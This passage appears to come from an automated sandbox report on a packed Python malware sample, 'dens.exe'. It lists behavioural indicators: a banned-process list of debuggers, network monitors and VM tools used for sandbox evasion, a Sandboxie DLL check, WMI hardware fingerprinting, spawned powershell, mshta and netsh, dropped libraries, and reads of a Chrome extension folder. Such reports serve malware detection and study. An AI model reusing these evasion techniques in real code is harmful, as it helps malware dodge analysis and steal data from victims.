            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0F76C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF62C0F76C0
            Source: C:\Users\user\Desktop\dens.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
            Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Description, ProviderName FROM Win32_LogicalDisk
            Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Command FROM Win32_StartupCommand
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "FIDDLER.EXE"P
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: *DXENSERVICE.EXE0
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: QEMU-GA.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "QEMU-GA.EXE"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "QEMU-GA.EXE"P
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELF.BANNED_PROCESS = ["HTTP TOOLKIT.EXE", "HTTPDEBUGGERUI.EXE","WIRESHARK.EXE", "FIDDLER.EXE", "REGEDIT.EXE", "TASKMGR.EXE", "VBOXSERVICE.EXE", "DF5SERV.EXE", "PROCESSHACKER.EXE", "VBOXTRAY.EXE", "VMTOOLSD.EXE", "VMWARETRAY.EXE", "IDA64.EXE", "OLLYDBG.EXE",
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "SBIEDLL.DLL"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "VMUSRVC.EXE"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DVMUSRVC.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 'DPROCESSHACKER.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "XENSERVICE.EXE"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: *DXENSERVICE.EXE
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2033261544.000002D9AC179000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "XENSERVICE.EXE", # XEN
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DSBIEDLL.DLL
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DFIDDLER.EXE0
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DQEMU-GA.EXEP
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DWIRESHARK.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMUSRVC.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "WIRESHARK.EXE"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "PROCESSHACKER.EXE"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DOLLYDBG.EXE
            Source: dens.exe, 00000001.00000003.1954169257.000002D9AC3C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "DF5SERV.EXE", "PROCESSHACKER.EXE", "VBOXTRAY.EXE", "VMTOOLSD.EXE", "VMWARETRAY.EXE", "IDA64.EXE", "OLLYDBG.EXE",
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "OLLYDBG.EXE"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "FIDDLER.EXE"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: XENSERVICE.EXE
            Source: dens.exe, 00000001.00000003.1772883134.000002D9AB3F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\SBIEDLL.DLLP\_MEI62482\SBIEDLL.DLL
            Source: dens.exe, 00000001.00000003.2030100732.000002D9AC3C2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1775186095.000002D9AC3C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034026381.000002D9AC3C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1954169257.000002D9AC3C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "FIDDLER.EXE",
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1783070234.000002D9AC1C5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776400001.000002D9AC1C1000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2032462700.000002D9AC1BB000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034615706.000002D9AC1D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HANDLE = CTYPES.WINDLL.LOADLIBRARY("SBIEDLL.DLL")
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3292
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 577
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4938
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 712
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-time-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\unicodedata.pyd
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\cryptography\hazmat\bindings\_rust.pyd
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-file-l1-2-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-heap-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-locale-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-process-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_brotli.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-file-l2-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-namedpipe-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-string-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\python312.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\select.pyd
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-errorhandling-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\yarl\_helpers_c.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_sqlite3.pyd
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-runtime-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-datetime-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_uuid.pyd
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-math-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_hashlib.pyd
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_http_parser.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-synch-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_cffi_backend.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_lzma.pyd
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_overlapped.pyd
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-debug-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\python3.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-processenvironment-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-conio-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_bz2.pyd
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_decimal.pyd
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-rtlsupport-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-utility-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-heap-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\frozenlist\_frozenlist.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\dens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_ssl.pyd
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_websocket.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\yarl\_quoting_c.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_wmi.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_http_writer.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\multidict\_multidict.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_socket.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-console-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_helpers.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62482\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\dens.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_0-18054
            Source: C:\Users\user\Desktop\dens.exe API coverage: 5.5 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3384 Thread sleep count: 3292 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544 Thread sleep count: 577 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 7324 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4588 Thread sleep count: 4938 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3732 Thread sleep count: 712 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324 Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3320 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
            Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
            Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_ComputerSystem
            Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Users\user\Desktop\dens.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
            Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\dens.exe Code function: 0_2_00007FF62C0F9280 FindFirstFileExW,FindClose,0_2_00007FF62C0F9280
            Source: C:\Users\user\Desktop\dens.exe Code function: 0_2_00007FF62C0F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF62C0F83C0
            Source: C:\Users\user\Desktop\dens.exe Code function: 0_2_00007FF62C111874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF62C111874
            Source: C:\Users\user\Desktop\dens.exe Code function: 1_2_00007FF62C0F9280 FindFirstFileExW,FindClose,1_2_00007FF62C0F9280
            Source: C:\Users\user\Desktop\dens.exe Code function: 1_2_00007FF62C111874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF62C111874
            Source: C:\Users\user\Desktop\dens.exe Code function: 1_2_00007FF62C0F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF62C0F83C0
            Source: C:\Users\user\Desktop\dens.exe Code function: 1_2_00007FFDFAB811E0 GetSystemInfo,1_2_00007FFDFAB811E0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\dens.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
            Source: C:\Users\user\Desktop\dens.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\Users\user\Desktop\dens.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
            Source: C:\Users\user\Desktop\dens.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
            Source: C:\Users\user\Desktop\dens.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
            Source: C:\Users\user\Desktop\dens.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
            Source: dens.exe, 00000001.00000003.2029829320.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2052097478.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060887548.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2047760361.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040630139.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: E: Hyper-V Guest Service
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmwareuser.exe"
            Source: dens.exe, 00000001.00000003.1954169257.000002D9AC3C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "df5serv.exe", "processhacker.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe", "ida64.exe", "ollydbg.exe",
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmwaretray.exe", # VMware
            Source: dens.exe, 00000001.00000003.2029767074.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066795317.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Remote Desktop V
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 7OvmwarePw
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vboxservice.exe", # VirtualBox
            Source: dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, net1.exe, 0000003D.00000002.1822300778.0000026B06DB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: *Hyper-V Administrators
            Source: dens.exe, 00000001.00000003.1701486676.000002D9AAD26000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041342997.000002D9AACF1000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2042938657.000002D9AAD34000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2045840713.000002D9AAD35000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1699132510.000002D9AAD35000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2051391013.000002D9AAD35000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1697078084.000002D9AAD35000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2058860933.000002D9AAD35000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1696439960.000002D9AAD26000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2049260177.000002D9AAD35000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703254242.000002D9AAD26000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWwQ
